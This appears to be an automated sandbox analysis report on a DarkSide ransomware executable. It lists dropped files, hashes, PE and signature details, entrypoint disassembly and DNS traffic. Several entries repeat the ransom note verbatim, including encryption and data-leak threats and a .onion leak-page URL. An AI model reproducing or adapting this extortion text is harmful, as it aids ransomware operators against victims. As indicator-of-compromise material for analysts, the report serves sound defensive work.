                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Music\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8010
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbXm0wcpdlOjFz2rbW:8mVcpM2rDmVcpM2rDmVcpM2r6
                                                                                      MD5:EF2EF1311ED9C8D68B9A8D3DDA11B484
                                                                                      SHA1:C84F5DBCCBE395002D7A1AD472B19A856DF3279B
                                                                                      SHA-256:20D546674D92FA53CF8C5BB978D7800385B892158A8BD5B16837285051A31759
                                                                                      SHA-512:0C429D01BAC389ADD6C155AE53BC8F3307F04AAC695B22AB1EFC77A970EE96382C14D67916CECCBFAF3BFE7C1A0CC9FF708348A1D2471FE3161F5F2FE4E34405
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Pictures\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8010
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbXm0wcpdlOjFz2rbW:8mVcpM2rDmVcpM2rDmVcpM2r6
                                                                                      MD5:EF2EF1311ED9C8D68B9A8D3DDA11B484
                                                                                      SHA1:C84F5DBCCBE395002D7A1AD472B19A856DF3279B
                                                                                      SHA-256:20D546674D92FA53CF8C5BB978D7800385B892158A8BD5B16837285051A31759
                                                                                      SHA-512:0C429D01BAC389ADD6C155AE53BC8F3307F04AAC695B22AB1EFC77A970EE96382C14D67916CECCBFAF3BFE7C1A0CC9FF708348A1D2471FE3161F5F2FE4E34405
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Saved Games\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Videos\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):8010
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbXm0wcpdlOjFz2rbW:8mVcpM2rDmVcpM2rDmVcpM2r6
                                                                                      MD5:EF2EF1311ED9C8D68B9A8D3DDA11B484
                                                                                      SHA1:C84F5DBCCBE395002D7A1AD472B19A856DF3279B
                                                                                      SHA-256:20D546674D92FA53CF8C5BB978D7800385B892158A8BD5B16837285051A31759
                                                                                      SHA-512:0C429D01BAC389ADD6C155AE53BC8F3307F04AAC695B22AB1EFC77A970EE96382C14D67916CECCBFAF3BFE7C1A0CC9FF708348A1D2471FE3161F5F2FE4E34405
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.1112291448563076
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:dGTnVXm/Ey6q99950F3ekXg1Q10nMCldimE8eawHjcDV:M4l68m0cyMCldzE9BHjcJ
                                                                                      MD5:341E092D7964B551BD2D177177378025
                                                                                      SHA1:7420DF32C28DD7DC2D287B91141CC06903982149
                                                                                      SHA-256:322FA1CC037E0272308011407F8DDEEED1529BE7BF21E867F3B91A7AF78BEE51
                                                                                      SHA-512:64F826E07D9F7F892B59A4965F19C968DB1E8B068B7A3E6D9FFAB3E8C44582D33F4A4BA6036F83F674D51C30763ED0478351F28CFA2639AF32665E23D8452DE0
                                                                                      Malicious:false
                                                                                      Preview: ................................................................................@... ....q#......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................?`....... .......h.1G..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@... .....#.............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11367434056994173
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:OCXVXm/Ey6q99950g1miUkXg1Q10nMCldimE8eawHza1miIfXnF:OCX4l68mg1tUcyMCldzE9BHza1tIf3F
                                                                                      MD5:E99DA09E3D3E1827D56044DF442BA946
                                                                                      SHA1:D97FC8964E44A7F17BCE19FAAA38F8B5B201EDC4
                                                                                      SHA-256:664DDC56CDBF4CE847887E9B088395202229EF26F8B341001827B374825C1879
                                                                                      SHA-512:932B69466710F5A0F25043176EE8F1E4E03568C0F1D9350C1984CF0FF8CE4563EB88D97991ABDAF8B98FC6120CA84ABB5FC80BF11729CE49EE48F992CBD235CC
                                                                                      Malicious:false
                                                                                      Preview: ............................................................................ ...@... .....!......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................?`....... .......a.1G..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@... .....!.............................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11360251702902835
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:OCVXm/Ey6q99950F1mK21kXg1Q10nMCldimE8eawHza1mKOF:OC4l68mF1i1cyMCldzE9BHza1M
                                                                                      MD5:B0D195F5FF730ACCC420FC3BB3818917
                                                                                      SHA1:818BE027C3B361EEE53BC25E1F82C7B093865B58
                                                                                      SHA-256:88BEA8F9A9229B2BBC6C220AEAD479215BC1D149DABEB63DCA6D93C0970522CA
                                                                                      SHA-512:F11A693034185B10666208B8300146151866B4F8736B0592267BBC469A12547295A9BADE55C1026A208C65F46D14C748D1AEA7FD4929B185874DCA5643713031
                                                                                      Malicious:false
                                                                                      Preview: ............................................................................ ...@... ....4.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................?`....... ......_S.1G..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@... ...TA..............................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):906
                                                                                      Entropy (8bit):3.1465789865752596
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rls8PZk9+MlWlLehB4yAq7ejCEs8vI:OaqdmuF3rlX++kWReH4yJ7MN3I
                                                                                      MD5:83B76B88FB5AD77FC1A88D7CC777B7F1
                                                                                      SHA1:263FDED0E0A79B31EF917CB34A26CBE099E2D1D1
                                                                                      SHA-256:531F2D7E42E90E4D05C44463EAFBCC9602EA563B66BDC3881E69E17B222EDFB2
                                                                                      SHA-512:8B42875798BD84D51B95033BBB118FBA8CD35AE6B7FCAAE0A3803A6F72AF3D3F0EE1ACD5FA53F24685B7C3E0DD622F006CB2F40E66E7D6BBE4B751020A906F68
                                                                                      Malicious:false
                                                                                      Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 1.2. .. 2.0.2.1. .0.6.:.1.7.:.5.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 1.2. .. 2.0.2.1. .0.6.:.1.7.:.5.5.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.884829006908391
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:P3FwQWmwUM.exe
                                                                                      File size:61784
                                                                                      MD5:c4da0137cbb99626fd44da707ae1bca8
                                                                                      SHA1:a38e9891152755d9e7fff7386bb5a1bca375bd91
                                                                                      SHA256:1d4c0b32aea68056755daf70689699200ffa09688495ccd65a0907cade18bd2a
                                                                                      SHA512:dd8212ff73522c6590ff8d8a3a48276fd872649eada2315b045c8c9f6cf054c3fe6cd741a16744eb82eff763acb745f07336c44db8f0c693770180cf7fd90645
                                                                                      SSDEEP:1536:mWIrgG/4CMjuhy03Z63tFjr5EOkpIsT6oKw8ebioQ+9o:ZG/4CJhxIdJr5sDBKw7jo
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.,`.....................>....................@.................................>......................................

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x40a30f
                                                                                      Entrypoint Section:.text1
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                      Time Stamp:0x602C1447 [Tue Feb 16 18:51:51 2021 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:f9ade0aa18f660a34a4fa23392e21838

                                                                                      Authenticode Signature

                                                                                      Signature Valid:true
                                                                                      Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                      Signature Validation Error:The operation completed successfully
                                                                                      Error Number:0
                                                                                      Not Before, Not After
                                                                                      • 12/20/2020 4:00:00 PM 12/21/2021 3:59:59 PM
                                                                                      Subject Chain
                                                                                      • CN=OASIS COURT LIMITED, O=OASIS COURT LIMITED, STREET=10 Stoneleigh Park, L=Colchester, S=Essex, PostalCode=CO3 9FA, C=GB
                                                                                      Version:3
                                                                                      Thumbprint MD5:45F07555A52F3B879EEF9866C1947E62
                                                                                      Thumbprint SHA-1:269F25E6B7C690AE094086BD7825D03B48D4FCB1
                                                                                      Thumbprint SHA-256:634D08D08A8AE4DBC0A8416DBB49C23DC44257E597DD7C0CB024F5EC41384370
                                                                                      Serial:00E4E795FD1FD25595B869CE22AA7DC49F

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push 00000010h
                                                                                      push 00410020h
                                                                                      push 00410010h
                                                                                      call 00007F96C8B8FBFCh
                                                                                      call 00007F96C8B8FE38h
                                                                                      call 00007F96C8B8FE60h
                                                                                      call 00007F96C8B8FE84h
                                                                                      call 00007F96C8B8ECBEh
                                                                                      push 00000000h
                                                                                      call dword ptr [0040B000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb10c0x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000xeb9.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xd2000x1f58.data
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0100x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb0000x10.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x83930x8400False0.953480113636data7.95739719557IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .text10xa0000x33c0x400False0.5556640625data5.47111115827IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0xb0000x1580x200False0.384765625data2.56207517749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xc0000x39f40x3400False0.969801682692data7.90932575456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x100000xec90x1000False0.935546875data7.68351864836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllExitProcess

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 12, 2021 06:16:17.734221935 CEST5377553192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:17.785813093 CEST53537758.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:19.093702078 CEST5183753192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:19.156347036 CEST53518378.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:20.232498884 CEST5541153192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:20.281095982 CEST53554118.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:21.276494026 CEST6366853192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:21.325546980 CEST53636688.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:22.491687059 CEST5464053192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:22.540365934 CEST53546408.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:23.515364885 CEST5873953192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:23.566950083 CEST53587398.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:28.770617962 CEST6033853192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:28.819262028 CEST53603388.8.8.8192.168.2.7
